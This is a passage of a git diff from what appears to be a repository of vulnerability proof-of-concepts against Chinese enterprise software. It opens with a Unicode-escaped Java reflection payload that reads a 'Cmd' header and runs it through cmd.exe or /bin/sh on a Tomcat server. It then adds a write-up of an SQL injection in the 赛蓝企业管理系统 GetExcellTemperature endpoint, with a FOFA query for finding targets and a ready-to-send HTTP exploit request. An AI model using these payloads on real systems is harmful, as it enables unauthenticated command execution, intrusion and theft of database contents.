\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0020\u003d\u0020\u0028\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0029\u0020\u0028\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u006a\u0020\u003d\u0020\u0030\u003b\u0020\u006a\u0020\u003c\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0073\u0069\u007a\u0065\u0028\u0029\u003b\u0020\u002b\u002b\u006a\u0029\u0020\u007b\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0067\u0065\u0074\u0028\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0072\u0065\u0071\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0071\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0073\u0070\u0020\u003d\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0052\u0065\u0073\u0070\u006f\u006e\u0073\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u0030\u005d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u0030\u005d\u0029\u003b\u0073\u0074\u0072\u0020\u003d\u0020\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0029\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0048\u0065\u0061\u0064\u0065\u0072\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0022\u0043\u006d\u0064\u0022\u007d\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u0020\u0021\u003d\u0020\u006e\u0075\u006c\u006c\u0020\u0026\u0026\u0020\u0021\u0073\u0074\u0072\u002e\u0069\u0073\u0045\u006d\u0070\u0074\u0079\u0028\u0029\u0029\u0020\u007b\u0020\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0053\u0074\u0061\u0074\u0075\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0032\u0030\u0030\u0029\u007d\u0029\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u0020\u0063\u006d\u0064\u0073\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u0063\u006d\u0064\u002e\u0065\u0078\u0065\u0022\u002c\u0020\u0022\u002f\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u0020\u003a\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u002f\u0062\u0069\u006e\u002f\u0073\u0068\u0022\u002c\u0020\u0022\u002d\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u0022\u0047\u0042\u004b\u0022\u003a\u0022\u0055\u0054\u0046\u002d\u0038\u0022\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0074\u0065\u0078\u0074\u0032\u0020\u003d\u0028\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0053\u0063\u0061\u006e\u006e\u0065\u0072\u0028\u0028\u006e\u0065\u0077\u0020\u0050\u0072\u006f\u0063\u0065\u0073\u0073\u0042\u0075\u0069\u006c\u0064\u0065\u0072\u0028\u0063\u006d\u0064\u0073\u0029\u0029\u002e\u0073\u0074\u0061\u0072\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0029\u002c\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u0029\u002e\u0075\u0073\u0065\u0044\u0065\u006c\u0069\u006d\u0069\u0074\u0065\u0072\u0028\u0022\u005c\u005c\u0041\u0022\u0029\u002e\u006e\u0065\u0078\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0072\u0065\u0073\u0075\u006c\u0074\u003d\u0028\u0022\u0045\u0078\u0065\u0063\u0075\u0074\u0065\u003a\u0020\u0020\u0020\u0020\u0022\u002b\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0074\u0065\u0078\u0074\u0032\u002c\u0022\u0075\u0074\u0066\u002d\u0038\u0022\u0029\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006f\u0072\u0067\u002e\u0061\u0070\u0061\u0063\u0068\u0065\u002e\u0074\u006f\u006d\u0063\u0061\u0074\u002e\u0075\u0074\u0069\u006c\u002e\u0062\u0075\u0066\u002e\u0042\u0079\u0074\u0065\u0043\u0068\u0075\u006e\u006b\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u003b\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u006f\u0062\u006a\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0030\u0029\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0072\u0065\u0073\u0075\u006c\u0074\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u0029\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u004d\u0065\u0074\u0068\u006f\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0076\u0061\u0072\u0035\u0029\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006a\u0061\u0076\u0061\u002e\u006e\u0069\u006f\u002e\u0042\u0079\u0074\u0065\u0042\u0075\u0066\u0066\u0065\u0072\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0077\u0072\u0061\u0070\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0063\u006c\u0073\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0074\u0072\u0075\u0065\u003b\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0020\u007d&modelName=test +``` + +![image-20240715105030627](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407152016000.png) \ No newline at end of file diff --git "a/\350\265\233\350\223\235\344\274\201\344\270\232\347\256\241\347\220\206\347\263\273\347\273\237GetExcellTemperature\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/\350\265\233\350\223\235\344\274\201\344\270\232\347\256\241\347\220\206\347\263\273\347\273\237GetExcellTemperature\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" new file mode 100644 index 0000000..91b6912 --- /dev/null +++ "b/\350\265\233\350\223\235\344\274\201\344\270\232\347\256\241\347\220\206\347\263\273\347\273\237GetExcellTemperature\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" @@ -0,0 +1,21 @@ +# 赛蓝企业管理系统GetExcellTemperature存在SQL注入漏洞 + +赛蓝企业管理系统 GetExcellTemperature 接口处SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +``` +body="www.cailsoft.com" || body="赛蓝企业管理系统" +``` + +## poc + +```yaml +GET /BaseModule/ExcelImport/GetExcellTemperature?ImportId=%27%20AND%206935%20IN%20(SELECT%20(CHAR(113)%2BCHAR(122)%2BCHAR(112)%2BCHAR(106)%2BCHAR(113)%2B(SELECT%20(CASE%20WHEN%20(6935%3D6935)%20THEN%20CHAR(49)%20ELSE%20CHAR(48)%20END))%2BCHAR(113)%2BCHAR(122)%2BCHAR(113)%2BCHAR(118)%2BCHAR(113)))%20AND%20%27qaq%27=%27qaq HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Accept-Encoding: gzip +Connection: close +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407162014918.png) \ No newline at end of file